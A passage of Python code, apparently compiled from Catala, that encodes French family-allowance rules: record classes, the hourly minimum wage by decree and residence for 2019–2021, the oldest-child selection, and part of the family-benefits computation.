                self.d_a_deja_ouvert_droit_aux_allocations_familiales == other.d_a_deja_ouvert_droit_aux_allocations_familiales)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "EnfantEntree(d_identifiant={},d_remuneration_mensuelle={},d_date_de_naissance={},d_prise_en_charge={},d_a_deja_ouvert_droit_aux_allocations_familiales={})".format(self.d_identifiant,
            self.d_remuneration_mensuelle, self.d_date_de_naissance,
            self.d_prise_en_charge,
            self.d_a_deja_ouvert_droit_aux_allocations_familiales)
class Enfant:
    """Generated record: a child with derived fields (age, schooling status) added (field-by-field equality)."""
    def __init__(self, identifiant: Integer, obligation_scolaire: SituationObligationScolaire, remuneration_mensuelle: Money, date_de_naissance: Date, age: Integer, prise_en_charge: PriseEnCharge, a_deja_ouvert_droit_aux_allocations_familiales: bool) -> None:
        self.identifiant = identifiant
        self.obligation_scolaire = obligation_scolaire
        self.remuneration_mensuelle = remuneration_mensuelle
        self.date_de_naissance = date_de_naissance
        self.age = age
        self.prise_en_charge = prise_en_charge
        self.a_deja_ouvert_droit_aux_allocations_familiales = a_deja_ouvert_droit_aux_allocations_familiales
    def __eq__(self, other: object) -> bool:
        if isinstance(other, Enfant):
            return (self.identifiant == other.identifiant and
                self.obligation_scolaire == other.obligation_scolaire and
                self.remuneration_mensuelle == other.remuneration_mensuelle and
                self.date_de_naissance == other.date_de_naissance and
                self.age == other.age and
                self.prise_en_charge == other.prise_en_charge and
                self.a_deja_ouvert_droit_aux_allocations_familiales == other.a_deja_ouvert_droit_aux_allocations_familiales)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "Enfant(identifiant={},obligation_scolaire={},remuneration_mensuelle={},date_de_naissance={},age={},prise_en_charge={},a_deja_ouvert_droit_aux_allocations_familiales={})".format(self.identifiant,
            self.obligation_scolaire, self.remuneration_mensuelle,
            self.date_de_naissance, self.age, self.prise_en_charge,
            self.a_deja_ouvert_droit_aux_allocations_familiales)
class SmicOut:
    """Generated output record of the Smic scope."""
    def __init__(self, brut_horaire_out: Money) -> None:
        self.brut_horaire_out = brut_horaire_out
    def __eq__(self, other: object) -> bool:
        if isinstance(other, SmicOut):
            return (self.brut_horaire_out == other.brut_horaire_out)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "SmicOut(brut_horaire_out={})".format(self.brut_horaire_out)
class SmicIn:
    """Generated input record of the Smic scope."""
    def __init__(self, date_courante_in: Date, residence_in: Collectivite) -> None:
        self.date_courante_in = date_courante_in
        self.residence_in = residence_in
    def __eq__(self, other: object) -> bool:
        if isinstance(other, SmicIn):
            return (self.date_courante_in == other.date_courante_in and
                self.residence_in == other.residence_in)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "SmicIn(date_courante_in={},residence_in={})".format(self.date_courante_in,
            self.residence_in)
class PrestationsFamilialesOut:
    """Generated output record of the PrestationsFamiliales scope.

    NOTE(review): __eq__ compares the two Callable fields by object identity
    (function equality), so structurally identical outputs with distinct
    closures compare unequal — generated behavior, kept as-is.
    """
    def __init__(self, droit_ouvert_out: Callable[[Enfant], bool], conditions_hors_age_out: Callable[[Enfant], bool], age_l512_3_2_out: Integer, regime_outre_mer_l751_1_out: bool, base_mensuelle_out: Money) -> None:
        self.droit_ouvert_out = droit_ouvert_out
        self.conditions_hors_age_out = conditions_hors_age_out
        self.age_l512_3_2_out = age_l512_3_2_out
        self.regime_outre_mer_l751_1_out = regime_outre_mer_l751_1_out
        self.base_mensuelle_out = base_mensuelle_out
    def __eq__(self, other: object) -> bool:
        if isinstance(other, PrestationsFamilialesOut):
            return (self.droit_ouvert_out == other.droit_ouvert_out and
                self.conditions_hors_age_out == other.conditions_hors_age_out and
                self.age_l512_3_2_out == other.age_l512_3_2_out and
                self.regime_outre_mer_l751_1_out == other.regime_outre_mer_l751_1_out and
                self.base_mensuelle_out == other.base_mensuelle_out)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "PrestationsFamilialesOut(droit_ouvert_out={},conditions_hors_age_out={},age_l512_3_2_out={},regime_outre_mer_l751_1_out={},base_mensuelle_out={})".format(self.droit_ouvert_out,
            self.conditions_hors_age_out, self.age_l512_3_2_out,
            self.regime_outre_mer_l751_1_out, self.base_mensuelle_out)
class PrestationsFamilialesIn:
    """Generated input record of the PrestationsFamiliales scope."""
    def __init__(self, date_courante_in: Date, prestation_courante_in: ElementPrestationsFamiliales, residence_in: Collectivite) -> None:
        self.date_courante_in = date_courante_in
        self.prestation_courante_in = prestation_courante_in
        self.residence_in = residence_in
    def __eq__(self, other: object) -> bool:
        if isinstance(other, PrestationsFamilialesIn):
            return (self.date_courante_in == other.date_courante_in and
                self.prestation_courante_in == other.prestation_courante_in and
                self.residence_in == other.residence_in)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "PrestationsFamilialesIn(date_courante_in={},prestation_courante_in={},residence_in={})".format(self.date_courante_in,
            self.prestation_courante_in, self.residence_in)
class AllocationFamilialesAvril2008Out:
    """Generated output record of the AllocationFamilialesAvril2008 scope."""
    def __init__(self, age_minimum_alinea_1_l521_3_out: Integer) -> None:
        self.age_minimum_alinea_1_l521_3_out = age_minimum_alinea_1_l521_3_out
    def __eq__(self, other: object) -> bool:
        if isinstance(other, AllocationFamilialesAvril2008Out):
            return (self.age_minimum_alinea_1_l521_3_out == other.age_minimum_alinea_1_l521_3_out)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "AllocationFamilialesAvril2008Out(age_minimum_alinea_1_l521_3_out={})".format(self.age_minimum_alinea_1_l521_3_out)
class AllocationFamilialesAvril2008In:
    """Generated input record of the AllocationFamilialesAvril2008 scope (no fields)."""
    def __init__(self, ) -> None:
        pass
    def __eq__(self, other: object) -> bool:
        # All instances are equal: the record has no fields.
        if isinstance(other, AllocationFamilialesAvril2008In):
            return (True)
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "AllocationFamilialesAvril2008In()".format()
class EnfantLePlusAgeOut:
    """Output structure of the EnfantLePlusAge scope (generated from Catala)."""

    def __init__(self, le_plus_age_out: Enfant) -> None:
        self.le_plus_age_out = le_plus_age_out

    def __eq__(self, other: object) -> bool:
        # Single-field comparison; any other type is unequal.
        if not isinstance(other, EnfantLePlusAgeOut):
            return False
        return self.le_plus_age_out == other.le_plus_age_out

    def __ne__(self, other: object) -> bool:
        return not (self == other)

    def __str__(self) -> str:
        return "EnfantLePlusAgeOut(le_plus_age_out={})".format(
            self.le_plus_age_out)
class EnfantLePlusAgeIn:
    """Input structure of the EnfantLePlusAge scope (generated from Catala)."""

    def __init__(self, enfants_in: List[Enfant]) -> None:
        self.enfants_in = enfants_in

    def __eq__(self, other: object) -> bool:
        # Single-field comparison; any other type is unequal.
        if not isinstance(other, EnfantLePlusAgeIn):
            return False
        return self.enfants_in == other.enfants_in

    def __ne__(self, other: object) -> bool:
        return not (self == other)

    def __str__(self) -> str:
        return "EnfantLePlusAgeIn(enfants_in={})".format(self.enfants_in)
class AllocationsFamilialesOut:
    """Output structure of the AllocationsFamiliales scope (generated from Catala)."""

    def __init__(self, montant_verse_out: Money) -> None:
        self.montant_verse_out = montant_verse_out

    def __eq__(self, other: object) -> bool:
        # Single-field comparison; any other type is unequal.
        if not isinstance(other, AllocationsFamilialesOut):
            return False
        return self.montant_verse_out == other.montant_verse_out

    def __ne__(self, other: object) -> bool:
        return not (self == other)

    def __str__(self) -> str:
        return "AllocationsFamilialesOut(montant_verse_out={})".format(
            self.montant_verse_out)
class AllocationsFamilialesIn:
    """Input structure of the AllocationsFamiliales scope (generated from Catala)."""

    def __init__(self, personne_charge_effective_permanente_est_parent_in: bool, personne_charge_effective_permanente_remplit_titre_I_in: bool, ressources_menage_in: Money, residence_in: Collectivite, date_courante_in: Date, enfants_a_charge_in: List[Enfant], avait_enfant_a_charge_avant_1er_janvier_2012_in: bool) -> None:
        self.personne_charge_effective_permanente_est_parent_in = personne_charge_effective_permanente_est_parent_in
        self.personne_charge_effective_permanente_remplit_titre_I_in = personne_charge_effective_permanente_remplit_titre_I_in
        self.ressources_menage_in = ressources_menage_in
        self.residence_in = residence_in
        self.date_courante_in = date_courante_in
        self.enfants_a_charge_in = enfants_a_charge_in
        self.avait_enfant_a_charge_avant_1er_janvier_2012_in = avait_enfant_a_charge_avant_1er_janvier_2012_in

    def __eq__(self, other: object) -> bool:
        # Field-by-field comparison; any other type is unequal.
        if not isinstance(other, AllocationsFamilialesIn):
            return False
        return (self.personne_charge_effective_permanente_est_parent_in == other.personne_charge_effective_permanente_est_parent_in and
                self.personne_charge_effective_permanente_remplit_titre_I_in == other.personne_charge_effective_permanente_remplit_titre_I_in and
                self.ressources_menage_in == other.ressources_menage_in and
                self.residence_in == other.residence_in and
                self.date_courante_in == other.date_courante_in and
                self.enfants_a_charge_in == other.enfants_a_charge_in and
                self.avait_enfant_a_charge_avant_1er_janvier_2012_in == other.avait_enfant_a_charge_avant_1er_janvier_2012_in)

    def __ne__(self, other: object) -> bool:
        return not (self == other)

    def __str__(self) -> str:
        template = "AllocationsFamilialesIn(personne_charge_effective_permanente_est_parent_in={},personne_charge_effective_permanente_remplit_titre_I_in={},ressources_menage_in={},residence_in={},date_courante_in={},enfants_a_charge_in={},avait_enfant_a_charge_avant_1er_janvier_2012_in={})"
        return template.format(
            self.personne_charge_effective_permanente_est_parent_in,
            self.personne_charge_effective_permanente_remplit_titre_I_in,
            self.ressources_menage_in,
            self.residence_in,
            self.date_courante_in,
            self.enfants_a_charge_in,
            self.avait_enfant_a_charge_avant_1er_janvier_2012_in)
class InterfaceAllocationsFamilialesOut:
    """Output structure of the InterfaceAllocationsFamiliales scope (generated from Catala)."""

    def __init__(self, i_montant_verse_out: Money) -> None:
        self.i_montant_verse_out = i_montant_verse_out

    def __eq__(self, other: object) -> bool:
        # Single-field comparison; any other type is unequal.
        if not isinstance(other, InterfaceAllocationsFamilialesOut):
            return False
        return self.i_montant_verse_out == other.i_montant_verse_out

    def __ne__(self, other: object) -> bool:
        return not (self == other)

    def __str__(self) -> str:
        return "InterfaceAllocationsFamilialesOut(i_montant_verse_out={})".format(
            self.i_montant_verse_out)
class InterfaceAllocationsFamilialesIn:
    """Input structure of the InterfaceAllocationsFamiliales scope (generated from Catala)."""

    def __init__(self, i_date_courante_in: Date, i_enfants_in: List[EnfantEntree], i_ressources_menage_in: Money, i_residence_in: Collectivite, i_personne_charge_effective_permanente_est_parent_in: bool, i_personne_charge_effective_permanente_remplit_titre_I_in: bool, i_avait_enfant_a_charge_avant_1er_janvier_2012_in: bool) -> None:
        self.i_date_courante_in = i_date_courante_in
        self.i_enfants_in = i_enfants_in
        self.i_ressources_menage_in = i_ressources_menage_in
        self.i_residence_in = i_residence_in
        self.i_personne_charge_effective_permanente_est_parent_in = i_personne_charge_effective_permanente_est_parent_in
        self.i_personne_charge_effective_permanente_remplit_titre_I_in = i_personne_charge_effective_permanente_remplit_titre_I_in
        self.i_avait_enfant_a_charge_avant_1er_janvier_2012_in = i_avait_enfant_a_charge_avant_1er_janvier_2012_in

    def __eq__(self, other: object) -> bool:
        # Field-by-field comparison; any other type is unequal.
        if not isinstance(other, InterfaceAllocationsFamilialesIn):
            return False
        return (self.i_date_courante_in == other.i_date_courante_in and
                self.i_enfants_in == other.i_enfants_in and
                self.i_ressources_menage_in == other.i_ressources_menage_in and
                self.i_residence_in == other.i_residence_in and
                self.i_personne_charge_effective_permanente_est_parent_in == other.i_personne_charge_effective_permanente_est_parent_in and
                self.i_personne_charge_effective_permanente_remplit_titre_I_in == other.i_personne_charge_effective_permanente_remplit_titre_I_in and
                self.i_avait_enfant_a_charge_avant_1er_janvier_2012_in == other.i_avait_enfant_a_charge_avant_1er_janvier_2012_in)

    def __ne__(self, other: object) -> bool:
        return not (self == other)

    def __str__(self) -> str:
        template = "InterfaceAllocationsFamilialesIn(i_date_courante_in={},i_enfants_in={},i_ressources_menage_in={},i_residence_in={},i_personne_charge_effective_permanente_est_parent_in={},i_personne_charge_effective_permanente_remplit_titre_I_in={},i_avait_enfant_a_charge_avant_1er_janvier_2012_in={})"
        return template.format(
            self.i_date_courante_in,
            self.i_enfants_in,
            self.i_ressources_menage_in,
            self.i_residence_in,
            self.i_personne_charge_effective_permanente_est_parent_in,
            self.i_personne_charge_effective_permanente_remplit_titre_I_in,
            self.i_avait_enfant_a_charge_avant_1er_janvier_2012_in)
def smic(smic_in_1: SmicIn):
    """Compute the "Smic" scope: brut_horaire, the gross hourly minimum wage.

    Generated from Catala.  Each ``local_var_*`` closure below encodes one
    candidate definition (one decree article); ``handle_default`` evaluates
    the exception closures first, then the justification (local_var_18),
    then the base case (local_var_20).  An applicable article returns its
    amount (in cents, via money_of_cents_string); a non-applicable one
    raises EmptyError so the next candidate is tried.

    :param smic_in_1: carries date_courante_in and residence_in.
    :return: SmicOut with brut_horaire_out set.
    :raises NoValueProvided: when no decree article covers the inputs.
    """
    date_courante_2 = smic_in_1.date_courante_in
    residence_3 = smic_in_1.residence_in
    try:
        # Base case: brut_horaire has no default value.
        def local_var_20(_: Any):
            raise EmptyError
        # Justification (./prologue.catala_fr l.43): always true, i.e. the
        # variable must be supplied by one of the exception branches.
        def local_var_18(_: Any):
            return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                start_line=43, start_column=10, end_line=43, end_column=22,
                law_headings=["Prologue"]), True)
        # Décret n° 2018-1173 — year 2019, métropole and the listed overseas
        # collectivities (everything except Mayotte): 1003 cents.
        def local_var_16(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=219, start_column=5,
                        end_line=228, end_column=6, law_headings=["Article 1",
                        "Décret n° 2018-1173 du 19 décembre 2018 portant relèvement du salaire minimum de croissance",
                        "Montant du salaire minimum de croissance",
                        "Décrets divers"]), ((date_courante_2 >=
                        date_of_numbers(2019, 1, 1)) and ((date_courante_2 <=
                        date_of_numbers(2019, 12, 31)) and ((residence_3 ==
                        Collectivite(Collectivite_Code.Metropole, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
                        ((residence_3 == Collectivite(Collectivite_Code.Guyane,
                        Unit())) or ((residence_3 ==
                        Collectivite(Collectivite_Code.Martinique, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.LaReunion, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.SaintBarthelemy,
                        Unit())) or ((residence_3 ==
                        Collectivite(Collectivite_Code.SaintMartin, Unit())) or
                        (residence_3 ==
                        Collectivite(Collectivite_Code.SaintPierreEtMiquelon,
                        Unit())))))))))))):
                    return money_of_cents_string("1003")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Décret n° 2018-1173 — year 2019, Mayotte only: 757 cents.
        def local_var_14(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=237, start_column=5,
                        end_line=239, end_column=6, law_headings=["Article 1",
                        "Décret n° 2018-1173 du 19 décembre 2018 portant relèvement du salaire minimum de croissance",
                        "Montant du salaire minimum de croissance",
                        "Décrets divers"]), ((date_courante_2 >=
                        date_of_numbers(2019, 1, 1)) and ((date_courante_2 <=
                        date_of_numbers(2019, 12, 31)) and (residence_3 ==
                        Collectivite(Collectivite_Code.Mayotte,
                        Unit()))))):
                    return money_of_cents_string("757")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Décret n° 2019-1387 — year 2020, all collectivities except Mayotte:
        # 1015 cents.
        def local_var_12(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=258, start_column=5,
                        end_line=267, end_column=6, law_headings=["Article 1",
                        "Décret n° 2019-1387 du 18 décembre 2019 portant relèvement du salaire minimum de croissance",
                        "Montant du salaire minimum de croissance",
                        "Décrets divers"]), ((date_courante_2 >=
                        date_of_numbers(2020, 1, 1)) and ((date_courante_2 <=
                        date_of_numbers(2020, 12, 31)) and ((residence_3 ==
                        Collectivite(Collectivite_Code.Metropole, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
                        ((residence_3 == Collectivite(Collectivite_Code.Guyane,
                        Unit())) or ((residence_3 ==
                        Collectivite(Collectivite_Code.Martinique, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.LaReunion, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.SaintBarthelemy,
                        Unit())) or ((residence_3 ==
                        Collectivite(Collectivite_Code.SaintMartin, Unit())) or
                        (residence_3 ==
                        Collectivite(Collectivite_Code.SaintPierreEtMiquelon,
                        Unit())))))))))))):
                    return money_of_cents_string("1015")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Décret n° 2019-1387 — year 2020, Mayotte only: 766 cents.
        def local_var_10(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=276, start_column=5,
                        end_line=278, end_column=6, law_headings=["Article 1",
                        "Décret n° 2019-1387 du 18 décembre 2019 portant relèvement du salaire minimum de croissance",
                        "Montant du salaire minimum de croissance",
                        "Décrets divers"]), ((date_courante_2 >=
                        date_of_numbers(2020, 1, 1)) and ((date_courante_2 <=
                        date_of_numbers(2020, 12, 31)) and (residence_3 ==
                        Collectivite(Collectivite_Code.Mayotte,
                        Unit()))))):
                    return money_of_cents_string("766")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Décret n° 2020-1598 — year 2021, all collectivities except Mayotte:
        # 1025 cents.
        def local_var_8(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=297, start_column=5,
                        end_line=306, end_column=6, law_headings=["Article 1",
                        "Décret n° 2020-1598 du 16 décembre 2020 portant relèvement du salaire minimum de croissance",
                        "Montant du salaire minimum de croissance",
                        "Décrets divers"]), ((date_courante_2 >=
                        date_of_numbers(2021, 1, 1)) and ((date_courante_2 <=
                        date_of_numbers(2021, 12, 31)) and ((residence_3 ==
                        Collectivite(Collectivite_Code.Metropole, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
                        ((residence_3 == Collectivite(Collectivite_Code.Guyane,
                        Unit())) or ((residence_3 ==
                        Collectivite(Collectivite_Code.Martinique, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.LaReunion, Unit())) or
                        ((residence_3 ==
                        Collectivite(Collectivite_Code.SaintBarthelemy,
                        Unit())) or ((residence_3 ==
                        Collectivite(Collectivite_Code.SaintMartin, Unit())) or
                        (residence_3 ==
                        Collectivite(Collectivite_Code.SaintPierreEtMiquelon,
                        Unit())))))))))))):
                    return money_of_cents_string("1025")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Décret n° 2020-1598 — year 2021, Mayotte only: 774 cents.
        def local_var_6(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=315, start_column=5,
                        end_line=317, end_column=6, law_headings=["Article 1",
                        "Décret n° 2020-1598 du 16 décembre 2020 portant relèvement du salaire minimum de croissance",
                        "Montant du salaire minimum de croissance",
                        "Décrets divers"]), ((date_courante_2 >=
                        date_of_numbers(2021, 1, 1)) and ((date_courante_2 <=
                        date_of_numbers(2021, 12, 31)) and (residence_3 ==
                        Collectivite(Collectivite_Code.Mayotte,
                        Unit()))))):
                    return money_of_cents_string("774")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # NOTE(review): the candidate order below (newest decree first) is
        # produced by the compiler; do not reorder — handle_default's
        # resolution depends on it.
        local_var_5 = handle_default([local_var_6, local_var_8, local_var_10,
                                      local_var_12, local_var_14,
                                      local_var_16], local_var_18,
                                     local_var_20)
    except EmptyError:
        # No article applied: surface a proper Catala error with the position
        # of the variable declaration.
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=43, start_column=10,
            end_line=43, end_column=22,
            law_headings=["Prologue"]))
    brut_horaire_4 = log_variable_definition(["Smic", "brut_horaire"],
        local_var_5)
    return SmicOut(brut_horaire_out=brut_horaire_4)
def allocation_familiales_avril2008(allocation_familiales_avril2008_in_22: AllocationFamilialesAvril2008In):
    """Compute the AllocationFamilialesAvril2008 scope.

    The scope defines a single constant: the minimum age of article
    L521-3 alinéa 1, fixed at 16.

    :raises NoValueProvided: if the constant definition is empty
        (cannot happen in practice, but kept for Catala semantics).
    """
    try:
        minimum_age = integer_of_string("16")
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=81, start_column=10,
            end_line=81, end_column=37,
            law_headings=["Prologue"]))
    age_minimum_alinea_1_l521_3_23 = log_variable_definition(
        ["AllocationFamilialesAvril2008", "âge_minimum_alinéa_1_l521_3"],
        minimum_age)
    return AllocationFamilialesAvril2008Out(
        age_minimum_alinea_1_l521_3_out=age_minimum_alinea_1_l521_3_23)
def enfant_le_plus_age(enfant_le_plus_age_in_25: EnfantLePlusAgeIn):
    """Compute the EnfantLePlusAge scope: pick the oldest child of the list.

    The fold keeps the element whose age is strictly greater; on equal ages
    the later element wins.  A sentinel child (identifiant -1, age 0) seeds
    the fold, so an empty input list yields the sentinel.
    """
    enfants_26 = enfant_le_plus_age_in_25.enfants_in
    try:
        try:
            try:
                def pick_older(current_best: Any, candidate: Any):
                    # Strictly-greater comparison: ties go to the candidate.
                    if current_best.age > candidate.age:
                        return current_best
                    return candidate
                # Neutral element of the fold.
                sentinel = Enfant(identifiant=-integer_of_string("1"),
                    obligation_scolaire=SituationObligationScolaire(
                        SituationObligationScolaire_Code.Pendant, Unit()),
                    remuneration_mensuelle=money_of_cents_string("0"),
                    date_de_naissance=date_of_numbers(1900, 1, 1),
                    age=integer_of_string("0"),
                    prise_en_charge=PriseEnCharge(
                        PriseEnCharge_Code.EffectiveEtPermanente, Unit()),
                    a_deja_ouvert_droit_aux_allocations_familiales=False)
                local_var_28 = list_fold_left(pick_older, sentinel, enfants_26)
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=85, start_column=10,
            end_line=85, end_column=21,
            law_headings=["Prologue"]))
    le_plus_age_27 = log_variable_definition(["EnfantLePlusÂgé",
        "le_plus_âgé"], local_var_28)
    return EnfantLePlusAgeOut(le_plus_age_out=le_plus_age_27)
def prestations_familiales(prestations_familiales_in_32: PrestationsFamilialesIn):
    """Compute the PrestationsFamiliales scope (generated from Catala).

    Resolves, in dependency order:
      - age_l512_3_2: the age limit of article L512-3 2° (constant 20);
      - base_mensuelle: the monthly base of family allowances, by
        yearly ministerial instruction;
      - the "smic" sub-scope call (gross hourly minimum wage);
      - regime_outre_mer_l751_1: whether the residence falls under the
        overseas regime of article L751-1;
      - plafond_l512_3_2: the income ceiling (55% of SMIC x 169 hours);
      - conditions_hors_age / droit_ouvert: per-child eligibility closures
        returned in the output structure.

    :raises NoValueProvided: when any variable resolves to no value.
    """
    date_courante_33 = prestations_familiales_in_32.date_courante_in
    prestation_courante_34 = prestations_familiales_in_32.prestation_courante_in
    residence_35 = prestations_familiales_in_32.residence_in
    # --- age_l512_3_2: constant 20 (./prologue.catala_fr l.68) ---
    try:
        local_var_37 = integer_of_string("20")
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=68, start_column=10,
            end_line=68, end_column=22,
            law_headings=["Prologue"]))
    age_l512_3_2_36 = log_variable_definition(["PrestationsFamiliales",
        "âge_l512_3_2"], local_var_37)
    # --- base_mensuelle: default resolution over the yearly instructions ---
    try:
        # Base case: no default amount.
        def local_var_48(_: Any):
            raise EmptyError
        # Justification: the variable must be defined (always true).
        def local_var_46(_: Any):
            return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                start_line=74, start_column=10, end_line=74, end_column=24,
                law_headings=["Prologue"]), True)
        # Instruction 2019: [2019-04-01, 2020-04-01) -> 41316 cents.
        def local_var_44(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=24, start_column=5,
                        end_line=25, end_column=34,
                        law_headings=["Instruction ministérielle N°DSS/SD2B/2019/65 du 25 mars 2019 relative à la revalorisation au 1er avril 2019 des prestations familiales servies en métropole",
                        "Montant de la base mensuelle des allocations familiales",
                        "Décrets divers"]), ((date_courante_33 >=
                        date_of_numbers(2019, 4, 1)) and (date_courante_33 <
                        date_of_numbers(2020, 4, 1)))):
                    return money_of_cents_string("41316")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Instruction 2020: [2020-04-01, 2021-04-01) -> 41404 cents.
        def local_var_42(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=44, start_column=5,
                        end_line=45, end_column=34,
                        law_headings=["Instruction interministérielle no DSS/SD2B/2020/33 du 18 février 2020 relative à la revalorisation au 1er avril 2020 des prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à La Réunion, à Saint-Barthélemy, à Saint-Martin et dans le département de Mayotte",
                        "Montant de la base mensuelle des allocations familiales",
                        "Décrets divers"]), ((date_courante_33 >=
                        date_of_numbers(2020, 4, 1)) and (date_courante_33 <
                        date_of_numbers(2021, 4, 1)))):
                    return money_of_cents_string("41404")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Instruction 2021: [2021-04-01, 2022-04-01) -> 41481 cents.
        def local_var_40(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=60, start_column=5,
                        end_line=61, end_column=34,
                        law_headings=["Instruction interministérielle n°DSS/2B/2021/65 du 19 mars 2021 relative à la revalorisation au 1er avril 2021 des prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et dans le département de Mayotte",
                        "Montant de la base mensuelle des allocations familiales",
                        "Décrets divers"]), ((date_courante_33 >=
                        date_of_numbers(2021, 4, 1)) and (date_courante_33 <
                        date_of_numbers(2022, 4, 1)))):
                    return money_of_cents_string("41481")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Candidate order is compiler-generated; do not reorder.
        local_var_39 = handle_default([local_var_40, local_var_42,
                                       local_var_44], local_var_46,
                                      local_var_48)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=74, start_column=10,
            end_line=74, end_column=24,
            law_headings=["Prologue"]))
    base_mensuelle_38 = log_variable_definition(["PrestationsFamiliales",
        "base_mensuelle"], local_var_39)
    # --- smic sub-scope: forward date_courante and residence ---
    try:
        try:
            try:
                local_var_52 = date_courante_33
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
        local_var_51 = log_variable_definition(["PrestationsFamiliales",
            "smic.date_courante"], local_var_52)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=41, start_column=10,
            end_line=41, end_column=23,
            law_headings=["Prologue"]))
    smic_dot_date_courante_50 = local_var_51
    try:
        try:
            try:
                local_var_55 = residence_35
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
        local_var_54 = log_variable_definition(["PrestationsFamiliales",
            "smic.résidence"], local_var_55)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=42, start_column=10,
            end_line=42, end_column=19,
            law_headings=["Prologue"]))
    smic_dot_residence_53 = local_var_54
    # Invoke the Smic scope, wrapped in call logging.
    result_56 = log_end_call(["PrestationsFamiliales", "smic", "Smic"],
        log_begin_call(["PrestationsFamiliales", "smic", "Smic"], smic,
        SmicIn(date_courante_in=smic_dot_date_courante_50,
        residence_in=smic_dot_residence_53)))
    smic_dot_brut_horaire_57 = result_56.brut_horaire_out
    # --- regime_outre_mer_l751_1 (article L751-1): True when the residence
    # is one of the listed overseas collectivities, False otherwise ---
    try:
        try:
            try:
                if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                        start_line=354, start_column=5,
                        end_line=359, end_column=30,
                        law_headings=["Article L751-1",
                        "Chapitre 1er : Généralités",
                        "Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
                        "Livre 7 : Régimes divers - Dispositions diverses",
                        "Partie législative",
                        "Code de la sécurité sociale"]), ((residence_35 ==
                        Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
                        ((residence_35 == Collectivite(Collectivite_Code.Guyane,
                        Unit())) or ((residence_35 ==
                        Collectivite(Collectivite_Code.Martinique, Unit())) or
                        ((residence_35 ==
                        Collectivite(Collectivite_Code.LaReunion, Unit())) or
                        ((residence_35 ==
                        Collectivite(Collectivite_Code.SaintBarthelemy,
                        Unit())) or (residence_35 ==
                        Collectivite(Collectivite_Code.SaintMartin,
                        Unit())))))))):
                    local_var_59 = True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        except EmptyError:
            # Fallback: not an overseas residence under L751-1.
            local_var_59 = False
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=69, start_column=10,
            end_line=69, end_column=33,
            law_headings=["Prologue"]))
    regime_outre_mer_l751_1_58 = log_variable_definition(["PrestationsFamiliales",
        "régime_outre_mer_l751_1"], local_var_59)
